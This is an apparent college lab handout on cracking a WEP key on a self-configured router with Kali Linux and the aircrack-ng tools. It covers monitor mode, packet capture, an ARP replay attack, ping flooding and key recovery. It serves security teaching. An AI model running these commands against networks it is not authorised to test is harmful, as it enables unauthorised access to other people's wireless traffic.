Project 22: Cracking WEP with Kali in S214 (20 pts.)

What You Need for This Project

Set up a WEP-Protected Wireless LAN

You need these three devices, set up as shown below.

Attacker: A computer with an appropriate wireless NIC booted to Kali Linux (detailed instructions below).

Router: Use any wireless router that is available. Connect a cable from any numbered port on the router to any PC, and disable all other network adapters on the PC. Use IPCONFIG to find the Default Gateway on the PC and open that address in a Web browser. Configure the network to use WEP, and make a note of the key, which is ten hexadecimal characters.

Wireless Client: Use any computer with a wireless card. Connect to the wireless router, typing in the ten-character key when you are prompted to. Disable all other network adapters on the wireless client computer. On the wireless client, enter this command to send a constant series of pings to the router, using your router's IP address instead of the example address below:

ping -t 192.168.10.1

Booting the Attacker PC to Kali Linux

Use a computer labelled "W" in S214.

Insert the Kali Boot DVD.

Power the machine off.

Power the machine on again, and tap the F9 key to bring up the boot menu. Ensure that CD-ROM is highlighted and press Enter.

Accept the default boot option for Kali Linux.

Log in as root with the password toor

Open a Terminal window.

Observing the wlan0 Device

In the Terminal window, type in this command, and then press the Enter key:
iwconfig
You should see the wlan0 device, as shown below on this page. It is in Mode:Managed, which is the normal mode for wireless networking. We need to get the card out of that mode, so we will first disable it.

In the Terminal window, type in this command, and then press the Enter key:

ifconfig wlan0 down

Starting the wifi-0 Device in Monitor Mode

In the Terminal window, type in these commands, and then press the Enter key:
airmon-ng check

airmon-ng check kill

airmon-ng start wifi0

You have now stopped the wireless card and restarted it with the special MadWiFi drivers, which are necessary for cracking WEP. Now the card is monitoring on all channels.

Capturing Packets to View the Available Networks

In the Terminal window, press Shift+Ctrl+N. This opens a new Konsole tab, labeled "Shell No. 2" at the bottom of the window.

In the "Shell No.2" window, type in this command, and then press the Enter key:

airodump-ng -w test -t wep wlan0
This command opens a window showing all WEP-using local networks, as shown below on this page. (My image showed the non-WEP networks too.) The captured packets are going to a file named "test", which isn't important.

The columns in the output are explained below:

You need four items from this screen, as highlighted in the figure above. Write down these three values for the network you want to crack:

In the lower section of your screen, find the STATION address that is associated with the access point you want to crack--the BSSID you noted earlier. This is the MAC address of the client.

Press Ctrl+C to stop the Airodump capture.

Restarting Monitoring on the Correct Channel

In the Terminal window, execute these commands.

They stop the wireless card, check for processes that might interfere with "monitor mode", and kill those processes.

airmon-ng stop wifi0
In the Terminal window, type in this command, and then press the Enter key:
airmon-ng start wifi0 11
Replace 11 with the CH number you wrote down in a previous step. Now the card is monitoring only the channel we are interested in.

Resuming Packet Capture

In the "Shell No. 2" window, type in this command, and then press the Enter key:
airodump-ng -c 11 -w output -t wep wlan0
Replace 11 with the CH number you noted earlier.

Now the card is monitoring only the channel we are interested in. This captures packets on the desired channel, and dumps into the file output.cap. Notice that the #Data are not rising quickly - you may not even see any data being captured at all.

Leave this capture running.

Performing an ARP Replay Attack

Now we will capture an ARP request, and replay it to force the Access Point to pump out a lot of IVs.

In the "Shell" window, type in this command, and then press the Enter key:

aireplay-ng -3 -b 00:11:50:1E:43:87 -h 00:16:B6:5B:A3:D6 wlan0
Replace 00:11:50:1E:43:87 with the BSSID you you wrote down in a previous step (the access point's MAC address).

Replace 00:16:B6:5B:A3:D6 with the MAC you wrote you wrote down in a previous step (the Wireless client's MAC address).

(The image below was taken with a different network adapter named rausb0, but now we are using the wlan0 adapter.)

aireplay-ng is waiting for an ARP packet. Disconnect the wireless client and reconnect it to create an ARP request.

Look at the "Shell - Konsole <2>" window. You usually need at least 50000 Data packets to crack a WEP key.

The #Data value should be rising very rapidly, as shown below on this page.

That means the ARP replay attack is successfully pumping IV values out of the access point, gathering data that can be used to crack the WEP encryption quickly.

Troubleshooting

If aireplay-ng stalls waiting for a beacon frame and cannot find any matching beacons, try re-typing the ESSID using only lowercase letters, and avoid using copy-and-paste.

Another option is to add the -D flag to the command to ignore beacons.

Troubleshooting

If the ARP replay fails, you can just make the network busier. One simple way to do that is to open 30 Command Prompt windows on the client, each running this command, using your router's IP address instead of the example address below:
ping -t -l 65000 192.168.10.1
They won't get replies, but they should send a lot of packets to the router and make the DATA increase rapidly.

Cracking the Key

In the Terminal window, press Shift+Ctrl+N. This opens a new Konsole tab, labeled "Shell No. 3" at the bottom of the window. In the "Shell No. 3" window, type in this command, and then press the Enter key:
aircrack-ng -a 1 -n 64 output*.cap
If a list of networks appears, find your network and type in its number, followed by the Enter key.

It should find the key within a few minutes, as shown below on this page.

Sending in the Image

The easiest way to capture this image is to take a photo of it with your cell phone.

Send the message to cnit.123@gmail.com with a subject line of Proj 22 From Your Name(s). If you are working in a group, list all the names in the subject line. Send a Cc to yourself.

If you don't have a cell phone that can take a photo, capture a snapshot on the Kali machine with Start, KSnapshot. Then send the email from the Kali machine using IceWeasel.

Returning the Equipment

Return the Kali Boot DVD, the router, and the cables to the lab monitor.

Credits

I got a lot of this from "Wireless Vulnerabilities and Cracking with the Aircrack Suite", by Stephen Argent, in the magazine hakin9, Issue 1/2008. There is a lot more information about cracking WEP and WPA in that article, it's great!

Last modified 12-2-14 2:01 pm by Sam Bowne